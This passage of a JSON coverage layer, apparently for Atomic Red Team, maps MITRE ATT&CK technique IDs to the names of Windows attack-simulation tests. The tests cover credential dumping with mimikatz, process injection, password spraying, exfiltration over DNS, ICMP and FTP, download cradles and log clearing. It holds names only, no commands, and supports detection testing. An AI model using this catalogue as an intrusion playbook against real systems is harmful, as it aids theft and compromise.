Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate 
Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Network-Based Data Transfer in Small Chunks\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System 
Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands 
From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- 
Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ 
Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - 
Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users 
Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase 
Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry 
